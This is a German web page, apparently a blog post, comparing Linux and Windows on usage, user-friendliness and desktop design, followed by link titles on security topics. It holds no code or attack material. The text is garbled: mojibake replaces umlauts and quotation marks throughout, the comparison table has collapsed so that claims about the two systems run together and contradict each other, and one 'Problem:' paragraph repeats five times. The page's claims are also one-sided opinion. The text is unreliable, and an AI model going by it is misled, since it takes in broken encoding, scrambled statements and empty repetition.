Siehe ‚ÄěMS Office 2007‚Äú, das ist nicht lauf¬≠f√§hig unter Win¬≠dows 10.
Lin­ux ist das meist genutzte Betrieb­ssys­tem!
Beispiel­sweise genutzt in:
  • embed¬≠ded Betrieb¬≠ssys¬≠teme
  • Routern und andere Net¬≠zw¬≠erk-Hard¬≠ware
  • Fernse¬≠her, Radio, Haushalts¬≠ger√§te
  • indus¬≠triellen Arbeitsmit¬≠tel
  • Inter¬≠net-Serv¬≠er
  • Daten¬≠bank-Sys¬≠te¬≠men
‚ÄúWin¬≠dows‚ÄĚ ist das meist genutzte Desk¬≠top-Betrieb¬≠ssys¬≠tem.
Win¬≠dows ist die meist genutzte Schnittstelle bei den Sparkassen-Ter¬≠mi¬≠nals f√ľr Kon¬≠toin¬≠hab¬≠er und oft genutzt bei √§lteren indus¬≠triellen Arbeitsmit¬≠teln.
Benutzer­fre­undlichkeit
Benutzerkonzepte sind langfristig angelegt und ändern sich meist nur durch anerkan­nte und prag­ma­tis­che Verbesserung.
Die Entwick­ler sind in Kom­mu­nika­tion mit den Benutzern.
Benutzerkonzepte ändern sich sprung­haft, sind auch mit Nachteilen behaftet und ohne erkennbare Vorteile.
Eine anerkan­nte Kom­mu­nika­tion mit den Benutzern existiert nicht.
Ver¬≠schiedene Desk¬≠top-Sys¬≠teme, wie ‚ÄěGnome‚Äú, ‚ÄěKDE‚Äú, ‚ÄěXFCE‚Äú, ‚ÄěMate‚Äú, ‚ÄěCin¬≠na¬≠mon‚Äú und weit¬≠ere, bieten ein angepasstes Nutzerver¬≠hal¬≠ten. Ein einziger Desk¬≠top und der ist nur schw¬≠er¬≠f√§l¬≠lig anpass¬≠bar.
Bei l√§n¬≠geren Prozessen wer¬≠den zu der Pro¬≠gres¬≠sions¬≠bar, noch die M√∂glichkeit gegeben, sich Details anzeigen zu lassen, also die tat¬≠s√§ch¬≠lich laufend¬≠en Oper¬≠a¬≠tio¬≠nen. Au√üer beim Kopier¬≠vor¬≠gang sind alle Pro¬≠gres¬≠sions¬≠bar unter Win¬≠dows ein Mys¬≠teri¬≠um. Fra¬≠gen wie, was passiert ger¬≠ade oder geht √ľber¬≠haupt noch was, bleiben somit unbeant¬≠wortet.

Ver­weise
Win¬≠dows 10 ‚Äď Vorteil und Nachteile
Win­dows und Lin­ux, der wirk­lich wahre Unter­schied
Win­dows 8 oder Lin­ux hat Fen­ster und keine U-Bahn!

Orientierungshilfen f√ľr Sicherheit

Dieser Beitrag wird immer erweit­ert.


Desktop
Microsofts Win­dows 10 Bot­net
Vor Win­dows 8 wird gewarnt
Der Staat­stro­jan­er
Bildbearbeitung und Scanner
Scan­ner die den Inhalt neu inter­pretieren.
Iris-Hack ein­fach gemacht.
E-Mail
Deutsche Indus¬≠trie sorgt sich stiefm√ľt¬≠ter¬≠lich um den Kun¬≠den.
Problem:
Ihr Linux hat keine vorinstallierte Aktualisierungssoftware? Und Sie wollen auch Ihre Distribution auf dem laufendem halten? Oder die nachträglich zu installierende Software will bis zu mehrere hundert Megabyte installieren?

.

Problem:
Ihr Linux hat keine vorinstallierte Aktualisierungssoftware? Und Sie wollen auch Ihre Distribution auf dem laufendem halten? Oder die nachträglich zu installierende Software will bis zu mehrere hundert Megabyte installieren?

.

Problem:
Ihr Linux hat keine vorinstallierte Aktualisierungssoftware? Und Sie wollen auch Ihre Distribution auf dem laufendem halten? Oder die nachträglich zu installierende Software will bis zu mehrere hundert Megabyte installieren?

.

Problem:
Ihr Linux hat keine vorinstallierte Aktualisierungssoftware? Und Sie wollen auch Ihre Distribution auf dem laufendem halten? Oder die nachträglich zu installierende Software will bis zu mehrere hundert Megabyte installieren?

.

Problem:
Ihr Linux hat keine vorinstallierte Aktualisierungssoftware? Und Sie wollen auch Ihre Distribution auf dem laufendem halten? Oder die nachträglich zu installierende Software will bis zu mehrere hundert Megabyte installieren?